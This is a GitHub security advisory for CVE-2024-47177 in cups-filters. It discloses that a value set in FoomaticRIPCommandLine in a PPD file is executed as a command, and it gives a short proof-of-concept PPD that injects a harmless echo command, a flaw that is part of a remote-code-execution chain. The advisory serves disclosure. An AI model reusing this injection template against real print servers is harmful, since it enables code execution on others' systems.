Skip to content

Command injection via FoomaticRIPCommandLine

High
zdohnal published GHSA-p9rh-jxmq-gq47 Sep 26, 2024

Package

cups-filters

Affected versions

<= 2.0.1

Patched versions

None

Description

Summary

Any value passed to FoomaticRIPCommandLine via a PPD file will be executed as a user controlled command.

Details

Any value passed to FoomaticRIPCommandLine via a PPD file will be executed as a user controlled command and, when combined with other logic bugs, this can lead to RCE.

PoC

This bug is part of an exploit chain leading to RCE described here.

*PPD-Adobe: "4.3"
*FormatVersion: "4.3"
*FileVersion: "2.0.0"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PSVersion: "(3010.000) 0"
...
...
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "echo 1 > /tmp/VULNERABLE"
...
...
*DefaultResolution: 300dpi`

Impact

Code execution.

Severity

High

CVE ID

CVE-2024-47177

Weaknesses

No CWEs

Credits